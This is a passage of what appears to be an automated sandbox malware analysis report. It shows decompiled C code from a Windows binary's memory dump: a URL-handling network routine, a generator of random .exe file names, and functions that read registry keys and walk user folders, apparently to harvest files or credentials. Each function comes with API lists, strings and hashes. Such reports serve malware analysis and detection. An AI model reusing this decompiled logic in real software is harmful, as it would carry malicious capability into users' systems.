						 *((char*)( *0x41fe88 + 0x124)) = _t17;
						SetEvent( *0x41fe84);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x00417d34
0x00417d46
0x00417d95
0x00417da0
0x00417da5
0x00000000
0x00000000
0x00417d52
0x00000000
0x00000000
0x00417d5e
0x00417d7c
0x00417d81
0x00417d87
0x00417d93
0x00417d93
0x00417d5e
0x00417db3

APIs

GetCurrentThread.KERNEL32 ref: 00417D2D
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00407563), ref: 00417D34
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00407563), ref: 00417D46
SetEvent.KERNEL32(0041FE78,?,00000001), ref: 00417D93
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00417DA0

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: ce455df3079921705bc29fff16741a4eedec9aee57f6b9f2d8edc4939ad62b38
Instruction ID: 079042112dc577b98d0c4fe3acc05a11c6aa4f89ec6e135c99dbc96148d1bc63
Opcode Fuzzy Hash: ce455df3079921705bc29fff16741a4eedec9aee57f6b9f2d8edc4939ad62b38
Instruction Fuzzy Hash: 5A01D2311443049BCB10AB78BD05BEA3B75EB88330F20023AF920961F2C670D895C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E1F, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405E25
ReleaseMutex.KERNEL32(?), ref: 00405E59
IsWindow.USER32(?), ref: 00405E60
PostMessageW.USER32(?,00000215,00000000), ref: 00405E7A
SendMessageW.USER32(?,00000215,00000000), ref: 00405E82

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: 93ed71eaa3c4a7e3bc6973d865eb6a909809f71b3b02224eecfd2cdb0d95ae83
Instruction ID: 365b3a01fc68c388d3bd3b52691effb8ec8f9afe1a37c7e35ecae49d32f55c7a
Opcode Fuzzy Hash: 93ed71eaa3c4a7e3bc6973d865eb6a909809f71b3b02224eecfd2cdb0d95ae83
Instruction Fuzzy Hash: BEF0C9752087009FC3219F24D9489B7BBB5FB98751B044A7DF89AA33B1D770A844CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004085D4, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 379
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004085D4(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v32;
				char _v36;
				char _v60;
				char _v72;
				intOrPtr _v124;
				void* _v136;
				char _v144;
				char _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t122;
				intOrPtr* _t123;
				char* _t124;
				void* _t131;
				void* _t134;
				void* _t138;
				void* _t146;
				void* _t148;
				char* _t150;
				void* _t155;
				void* _t157;
				void* _t158;
				void* _t161;
				void* _t166;
				intOrPtr _t168;
				intOrPtr* _t170;
				void* _t171;
				void* _t176;
				intOrPtr _t180;
				intOrPtr _t181;
				signed int _t183;
				intOrPtr _t188;
				void* _t191;
				void* _t192;
				void* _t194;
				signed int _t200;
				void* _t204;
				void* _t207;
				signed int _t208;
				void* _t209;
				void* _t214;
				char* _t217;
				intOrPtr _t218;
				char* _t223;
				char* _t226;
				intOrPtr _t228;
				intOrPtr* _t229;
				intOrPtr _t230;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t274;

				_t207 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x41eaa4);
				_t215 =  *0x41eac0; // 0x0
				if(_t215 == 0) {
					L8:
					_t230 = _a4;
					L9:
					LeaveCriticalSection(0x41eaa4);
					_t122 =  *((intOrPtr*)(_t230 + 0x40));
					_t244 = _t122 - _t207;
					if(_t122 == _t207) {
						L33:
						if((_v16 & 0x00000001) == 0) {
							_t181 =  *((intOrPtr*)(_t230 + 0x44));
							_t261 = _t181 - _t207;
							if(_t181 != _t207 && E00407E4B(_t215, _t220, _t261, 3, _t181,  *(_t230 + 8),  *(_t230 + 0xc), _t207) != 0) {
								_v16 = _v16 | 0x00000001;
							}
						}
						if( *(_t230 + 0x20) >= 0x21) {
							_t176 = 0xe;
							E0040C9FD(_t176,  &_v72);
							_t228 =  *((intOrPtr*)(_t230 + 0x1c));
							if(E00411177( &_v72, _t228, 0x21) == 0) {
								_t180 =  *((intOrPtr*)(_t228 + 0x21));
								if(_t180 == 0x3b || _t180 == 0) {
									_v16 = _v16 | 0x00000010;
								}
							}
						}
						_t123 =  *((intOrPtr*)(_t230 + 0x2c));
						_v24 = _t207;
						if(_t123 == _t207 ||  *_t123 == _t207) {
							L49:
							_t124 =  *((intOrPtr*)(_t230 + 0x34));
							__eflags = _t124 - _t207;
							if(_t124 == _t207) {
								goto L57;
							}
							__eflags =  *_t124;
							if( *_t124 == 0) {
								goto L57;
							}
							_t161 = 0x10;
							E0040CA33(_t161,  &_v144);
							_t166 = E00411E74( &_v24,  &_v144,  *((intOrPtr*)(_a4 + 0x34)));
							_t237 = _t237 + 0xc;
							goto L52;
						} else {
							_t170 =  *((intOrPtr*)(_t230 + 0x30));
							if(_t170 == _t207 ||  *_t170 == _t207) {
								goto L49;
							} else {
								_t171 = 0xf;
								E0040CA33(_t171,  &_v248);
								_push( *((intOrPtr*)(_a4 + 0x30)));
								_t166 = E00411E74( &_v24,  &_v248,  *((intOrPtr*)(_a4 + 0x2c)));
								_t237 = _t237 + 0x10;
								L52:
								if(_t166 > _t207) {
									_t168 = E004124B5(_v24, _t166 + _t166);
									_t274 =  *0x41e58c - _t168; // 0x0
									if(_t274 != 0) {
										_t58 =  &_v16;
										 *_t58 = _v16 | 0x00000020;
										__eflags =  *_t58;
										 *0x41e58c = _t168;
									} else {
										E00411106(_v24);
										_v24 = _t207;
									}
								}
								_t230 = _a4;
								L57:
								if(_v9 != 0xff) {
									__eflags = _v9 - 1;
									if(_v9 != 1) {
										L64:
										if((_v16 & 0x00000008) == 0) {
											L90:
											E00411106(_v24);
											_t208 = _v16;
											if((_t208 & 0x00000001) == 0) {
												if(E00407EB3(_t220, _t230) != 0) {
													_t208 = _t208 | 0x00000002;
												}
												if((_t208 & 0x00000010) != 0 && E0040826D(_t230, _t220) != 0) {
													_t208 = _t208 | 0x00000004;
												}
											}
											return _t208;
										}
										_t130 =  *(_t230 + 0x28);
										_t209 = 0;
										if( *(_t230 + 0x28) != 0) {
											__eflags = _v16 & 0x00000010;
											if((_v16 & 0x00000010) == 0) {
												__eflags =  *(_t230 + 0x20);
												if( *(_t230 + 0x20) != 0) {
													L89:
													_v16 = _v16 & 0xfffffff7;
													goto L90;
												}
												_t223 =  &_v36;
												_t131 = 0xa;
												E0040C9FD(_t131, _t223);
												_push(_t223);
												_push(9);
												L78:
												_pop(_t134);
												_v20 = E00411564(_t134);
												L79:
												if(_v20 == 0) {
													goto L89;
												}
												E0040DBE6( &_v32);
												_t138 = E00411346( *(_t230 + 0xc), 0,  *(_t230 + 8));
												_t225 = _t138;
												if(_t138 != 0) {
													_t220 = 0x3c;
													E004111B9( &_v136,  &_v136, 0, _t220);
													_v136 = _t220;
													if(InternetCrackUrlA( *(_t230 + 8),  *(_t230 + 0xc), 0,  &_v136) == 1) {
														_t146 = 7;
														E0040CA33(_t146,  &_v248);
														_t148 = 0xb;
														E0040CA33(_t148,  &_v60);
														_t217 =  *(_a4 + 0x10);
														_t150 = 0x40310c;
														_t220 =  ==  ? 0x40310c : _v24;
														_t234 =  ==  ? 0x40310c : _v32;
														if(_t217 == 0) {
															_t217 = "-";
														}
														if((_v16 & 0x00000001) != 0) {
															_t150 =  &_v60;
														}
														_push(_v20);
														_push(_t220);
														_push(_t234);
														_push(_t217);
														_push(_t150);
														_t155 = E00410F70(_t217, _t220, (0 | _v124 == 0x00000004) + 0xb, (0 | _v124 == 0x00000004) + 0xb, _t225, 0,  &_v248, _t225);
														_t230 = _a4;
														_t209 = _t155;
													}
													E00411106(_t225);
												}
												E00411106(_v32);
												E00411106(_v20);
												if(_t209 != 0) {
													goto L90;
												} else {
													goto L89;
												}
											}
											_t220 = E00411564(_t130,  *((intOrPtr*)(_t230 + 0x24)));
											_v20 = _t220;
											__eflags = _t220;
											if(_t220 == 0) {
												goto L89;
											}
											_t157 = 0;
											__eflags =  *(_t230 + 0x28);
											if( *(_t230 + 0x28) <= 0) {
												goto L79;
											} else {
												goto L70;
											}
											do {
												L70:
												_t218 =  *((intOrPtr*)(_t157 + _t220));
												__eflags = _t218 - 0x26;
												if(_t218 != 0x26) {
													__eflags = _t218 - 0x2b;
													if(_t218 == 0x2b) {
														 *((char*)(_t157 + _t220)) = 0x20;
													}
												} else {
													 *((char*)(_t157 + _t220)) = 0xa;
												}
												_t157 = _t157 + 1;
												__eflags = _t157 -  *(_t230 + 0x28);
											} while (_t157 <  *(_t230 + 0x28));
											goto L79;
										}
										_t226 =  &_v36;
										_t158 = 9;
										E0040C9FD(_t158, _t226);
										_push(_t226);
										_push(7);
										goto L78;
									}
									L63:
									_v16 = _v16 | 0x00000008;
									goto L64;
								}
								if( *((char*)(_t230 + 0x18)) != 1 ||  *(_t230 + 0x28) <= _t207) {
									if((_v16 & 0x00000020) == 0) {
										goto L64;
									}
								}
								goto L63;
							}
						}
					}
					_t183 = E00416A93( &_v32, _t220, _t244, _t122, 0x4e25, 0x10000000);
					_t215 = _v32;
					_v20 = _t183;
					if(E00411F98(_t183, _v32) == 0) {
						L32:
						E00411106(_v20);
						_t207 = 0;
						goto L33;
					}
					_t229 = _v20;
					do {
						_t215 = _t229 + 1;
						if( *_t215 == 0) {
							goto L31;
						}
						_t188 =  *_t229;
						if(_t188 == 0x21) {
							L22:
							_t229 = _t215;
							L23:
							_t220 = 0;
							_t215 = _t229;
							if(E00407B90(_t229, 0,  *(_t230 + 8),  *(_t230 + 0xc)) == 0) {
								goto L31;
							}
							_t191 = _t214;
							if(_t191 == 0) {
								L29:
								_v9 = 1;
								L30:
								if(_t214 != 2) {
									goto L32;
								}
								goto L31;
							}
							_t192 = _t191 - 1;
							if(_t192 == 0) {
								_v9 = 0;
								goto L30;
							}
							_t194 = _t192;
							if(_t194 == 0) {
								_v9 = 0xff;
								E0040845B(_t215, 0, E00411346( *(_t230 + 0xc), 0,  *(_t230 + 8)),  *((intOrPtr*)(_t230 + 0x10)), 0);
								goto L30;
							}
							if(_t194 != 1) {
								goto L30;
							}
							_v16 = _v16 | 0x00000001;
							goto L29;
						}
						if(_t188 == 0x2d) {
							goto L22;
						}
						if(_t188 == 0x40) {
							goto L22;
						}
						if(_t188 == 0x5e) {
							_t214 = 4;
							goto L22;
						}
						_t214 = 0;
						goto L23;
						L31:
						_t229 = E00411FD6(_t229, 1);
					} while (_t229 != 0);
					goto L32;
				}
				_t240 =  *0x41eabc - _t207; // 0x0
				if(_t240 == 0) {
					goto L8;
				}
				_t230 = _a4;
				_t220 = 0;
				if(E00407B90(_t215, 0,  *(_t230 + 8),  *(_t230 + 0xc)) != 0) {
					_t200 = E0040CB1D();
					_v20 = _t200;
					if(_t200 != 0) {
						_t204 = E00407C4A(0, 4,  &_v20,  *0x41eabc);
						_push(_v20);
						if(_t204 == 0) {
							E00411106();
						}
						E0040CB88(_t215);
					}
					E00411106( *0x41eabc);
					E00411106( *0x41eac0);
					 *0x41eabc = _t207;
					 *0x41eac0 = _t207;
				}
				goto L9;
			}

0x004085e5
0x004085e8
0x004085eb
0x004085ef
0x004085f5
0x004085fd
0x0040866e
0x0040866e
0x00408671
0x00408672
0x00408678
0x0040867b
0x0040867d
0x00408729
0x0040872d
0x0040872f
0x00408732
0x00408734
0x00408749
0x00408749
0x00408734
0x00408751
0x00408758
0x00408759
0x0040875e
0x0040876f
0x00408771
0x00408776
0x0040877c
0x0040877c
0x00408776
0x0040876f
0x00408780
0x00408783
0x00408788
0x004087ed
0x004087ed
0x004087f0
0x004087f2
0x00000000
0x00000000
0x004087f4
0x004087f7
0x00000000
0x00000000
0x00408801
0x00408802
0x00408814
0x00408819
0x00000000
0x0040878f
0x0040878f
0x00408794
0x00000000
0x0040879b
0x004087a3
0x004087a4
0x004087ac
0x004087b9
0x004087be
0x0040881c
0x0040881e
0x00408826
0x0040882b
0x00408831
0x00408840
0x00408840
0x00408840
0x00408844
0x00408833
0x00408836
0x0040883b
0x0040883b
0x00408831
0x00408849
0x0040884c
0x00408850
0x00408865
0x00408869
0x0040886f
0x00408873
0x004089e3
0x004089e6
0x004089eb
0x004089f1
0x004089fb
0x004089fd
0x004089fd
0x00408a03
0x00408a10
0x00408a10
0x00408a03
0x00408a19
0x00408a19
0x00408879
0x0040887c
0x00408880
0x00408894
0x00408898
0x004088d5
0x004088d9
0x004089df
0x004089df
0x00000000
0x004089df
0x004088e1
0x004088e4
0x004088e5
0x004088ec
0x004088ed
0x004088ef
0x004088ef
0x004088f5
0x004088f8
0x004088fc
0x00000000
0x00000000
0x00408905
0x00408912
0x00408917
0x0040891b
0x00408923
0x0040892e
0x0040893f
0x00408951
0x0040895b
0x0040895c
0x00408966
0x00408967
0x00408975
0x0040897a
0x0040897f
0x00408984
0x00408989
0x0040898b
0x0040898b
0x00408994
0x00408996
0x00408996
0x00408999
0x0040899c
0x0040899d
0x0040899e
0x0040899f
0x004089b8
0x004089bd
0x004089c3
0x004089c3
0x004089c6
0x004089c6
0x004089ce
0x004089d6
0x004089dd
0x00000000
0x00000000
0x00000000
0x00000000
0x004089dd
0x004088a2
0x004088a4
0x004088a7
0x004088a9
0x00000000
0x00000000
0x004088af
0x004088b1
0x004088b4
0x00000000
0x00000000
0x00000000
0x00000000
0x004088b6
0x004088b6
0x004088b6
0x004088b9
0x004088bc
0x004088c4
0x004088c7
0x004088c9
0x004088c9
0x004088be
0x004088be
0x004088be
0x004088cd
0x004088ce
0x004088ce
0x00000000
0x004088d3
0x00408884
0x00408887
0x00408888
0x0040888f
0x00408890
0x00000000
0x00408890
0x0040886b
0x0040886b
0x00000000
0x0040886b
0x00408856
0x00408861
0x00000000
0x00000000
0x00408863
0x00000000
0x00408856
0x00408794
0x00408788
0x00408691
0x00408696
0x00408699
0x004086a3
0x0040871f
0x00408722
0x00408727
0x00000000
0x00408727
0x004086a5
0x004086a8
0x004086a8
0x004086ae
0x00000000
0x00000000
0x004086b0
0x004086b4
0x004086d4
0x004086d4
0x004086d6
0x004086d9
0x004086de
0x004086e7
0x00000000
0x00000000
0x004086ec
0x004086ef
0x00408707
0x00408707
0x0040870b
0x0040870e
0x00000000
0x00000000
0x00000000
0x0040870e
0x004086f1
0x004086f2
0x004087e4
0x00000000
0x004087e4
0x004086f9
0x004086fa
0x004087cb
0x004087da
0x00000000
0x004087da
0x00408701
0x00000000
0x00000000
0x00408703
0x00000000
0x00408703
0x004086b8
0x00000000
0x004086ce
0x004086bc
0x00000000
0x004086ca
0x004086c0
0x004086c6
0x00000000
0x004086c6
0x004086c2
0x00000000
0x00408710
0x00408719
0x0040871b
0x00000000
0x004086a8
0x004085ff
0x00408605
0x00000000
0x00000000
0x00408607
0x0040860d
0x00408619
0x0040861b
0x00408620
0x00408625
0x00408633
0x00408638
0x0040863d
0x0040863f
0x00408644
0x00408645
0x00408645
0x00408650
0x0040865b
0x00408660
0x00408666
0x00408666
0x00000000

APIs

EnterCriticalSection.KERNEL32(0041EAA4), ref: 004085EF
LeaveCriticalSection.KERNEL32(0041EAA4), ref: 00408672
InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 00408948

Part of subcall function 0040CB1D: CreateMutexW.KERNEL32(0041E5C8,00000000,0041EBC0,0041EAA4,?,?,00408620), ref: 0040CB45

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Strings

, xrefs: 0040885D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CrackCreateEnterFreeHeapInternetLeaveMutex
String ID:
API String ID: 3106581358-3916222277
Opcode ID: 63c2d45459a4a728e339a58661f1cafa24066fbc5905b62cfe620fc5f6ddd24f
Instruction ID: 8767c4eedb411f65a7c176bb17cd93873e74f37eeef9dcc6fc072b61af313365
Opcode Fuzzy Hash: 63c2d45459a4a728e339a58661f1cafa24066fbc5905b62cfe620fc5f6ddd24f
Instruction Fuzzy Hash: 6DD1C431900205ABDF20AB65CE45BEFBBB5AF04304F14887FE991B72E1CB799941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041532E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041532E(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0041248B(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E0041243F();
				_t77 = "bcdfghklmnpqrstvwxz012345";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy6789";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy6789";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E0041243F() & 0x00000100) == 0) {
								_v32 = "aeiouy6789";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy6789";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000f) + 0xa;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0041243F() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E0041248B(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x00415343
0x00415345
0x00415348
0x0041534d
0x00415357
0x00415365
0x0041536c
0x00415359
0x00415359
0x0041535c
0x0041535c
0x0041536f
0x00415371
0x00415374
0x00415379
0x00415385
0x00415388
0x0041538c
0x00415398
0x004153a6
0x004153ad
0x0041539a
0x0041539a
0x0041539d
0x0041539d
0x004153b0
0x004153b0
0x004153b7
0x004153cd
0x004153d0
0x00415401
0x004153ee
0x004153f0
0x004153f1
0x004153f1
0x00415409
0x0041540d
0x0041540e
0x00415411
0x0041541a
0x0041541a
0x00415421
0x0041543c
0x00415427
0x00415427
0x0041542a
0x0041542e
0x00415434
0x00415437
0x00415438
0x00000000
0x00000000
0x0041543a
0x00000000
0x00415438
0x0041542e
0x0041543f
0x0041543f
0x00415445
0x00415449
0x0041544f
0x00415455
0x00415455
0x0041545c

APIs

Part of subcall function 0041243F: GetTickCount.KERNEL32 ref: 0041243F

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041544F

Strings

.exe, xrefs: 00415339
aeiouy6789, xrefs: 0041535C, 00415365, 0041539D, 004153A6
bcdfghklmnpqrstvwxz012345, xrefs: 0041534D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy6789$bcdfghklmnpqrstvwxz012345
API String ID: 2674899715-3938053301
Opcode ID: 6dd538802afa6c65e97fe1efeace7a2e59a061cd4dd51bb9ae7ca8ac98397921
Instruction ID: e2c7b2ebac527a42ecbed4caeac2a8f035c508ea89164a1ab0844a3239ad363e
Opcode Fuzzy Hash: 6dd538802afa6c65e97fe1efeace7a2e59a061cd4dd51bb9ae7ca8ac98397921
Instruction Fuzzy Hash: EB319171D1061ADBCB109FA5C1453FEB7B0EF80344F54806BD961EB281E7BC9AC18B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040A959, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040A959(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E004111B9( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E0040CA33(_t28,  &_v116);
				_t30 = 0x61;
				E0040CA33(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E004150D3(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E0040A711(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00411106(_v12);
					}
					_push(0xcb);
					return E004095BC(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E0040CA33(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004165E9( &_v636,  &_v16, _t68, 1, 2, E0040A76B,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040a959
0x0040a959
0x0040a96e
0x0040a978
0x0040a979
0x0040a983
0x0040a984
0x0040a997
0x0040a9a2
0x0040a9aa
0x0040a9ac
0x0040a9ae
0x0040a9bb
0x0040a9cc
0x0040a9cc
0x0040a9ae
0x0040a9d4
0x0040aa3c
0x0040aa3c
0x00000000
0x0040aa53
0x0040aa41
0x00000000
0x0040a9d6
0x0040a9d8
0x0040a9db
0x0040a9dc
0x0040a9e3
0x0040a9ea
0x0040a9f1
0x0040a9f8
0x0040a9fb
0x0040a9fd
0x0040a9fd
0x0040aa0b
0x0040aa11
0x0040aa13
0x0040aa25
0x0040aa2e
0x0040aa2e
0x0040aa33
0x0040aa34
0x0040aa39
0x00000000
0x0040aa39

APIs

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040A9BB
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040AA0B

Strings

#, xrefs: 0040A9E3
&, xrefs: 0040A9F1

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 4bb0de24b23f1c83c464883d01574158cbaabce5f035e47c61a3bd17b19ba92f
Instruction ID: bbbf1cebff6ff9ccf6a0c9ca70cea9f2276e7aeb110cf395158a200f1965a09d
Opcode Fuzzy Hash: 4bb0de24b23f1c83c464883d01574158cbaabce5f035e47c61a3bd17b19ba92f
Instruction Fuzzy Hash: 643150B2E00218BADF10EBA0DC89FDEB77CEB04304F10456BB601F7191D6789A858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B209, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B209(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E004111B9( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E0040CA33(_t28,  &_v120);
				_t30 = 0x78;
				E0040CA33(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E004150D3(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E0040AFAC(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00411106(_v12);
					}
					_push(0xcb);
					return E004095BC(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E0040CA33(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E004165E9( &_v644,  &_v16, _t68, 1, 2, E0040AFE4,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0040b209
0x0040b209
0x0040b21e
0x0040b228
0x0040b229
0x0040b233
0x0040b234
0x0040b247
0x0040b252
0x0040b25a
0x0040b25c
0x0040b25e
0x0040b26b
0x0040b27c
0x0040b27c
0x0040b25e
0x0040b284
0x0040b2ec
0x0040b2ec
0x00000000
0x0040b303
0x0040b2f1
0x00000000
0x0040b286
0x0040b288
0x0040b28b
0x0040b28c
0x0040b293
0x0040b29a
0x0040b2a1
0x0040b2a8
0x0040b2ab
0x0040b2ad
0x0040b2ad
0x0040b2bb
0x0040b2c1
0x0040b2c3
0x0040b2d5
0x0040b2de
0x0040b2de
0x0040b2e3
0x0040b2e4
0x0040b2e9
0x00000000
0x0040b2e9

APIs

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040B26B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,00000003,00000000,00000008,?,00000000), ref: 0040B2BB

Strings

#, xrefs: 0040B2A1
&, xrefs: 0040B29A

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 84b794263292700c73807caf9bdfb40b9bef29356d879a4d81021beeeb318a01
Instruction ID: ae22c46193441e3666281f50073b9b66f937e5a6e2bdf1b723683a27e7893c49
Opcode Fuzzy Hash: 84b794263292700c73807caf9bdfb40b9bef29356d879a4d81021beeeb318a01
Instruction Fuzzy Hash: 38312DB2D00218ABDF10EBE19C89BDEB77CEB04314F10457AF605F7191D7789A468BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406D1E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D1E(void* __ecx, WCHAR* __edi, char _a4) {
				char _v108;
				char _v158;
				char _v178;
				char _v198;
				char _v596;
				void* __esi;
				signed int _t12;
				int _t14;
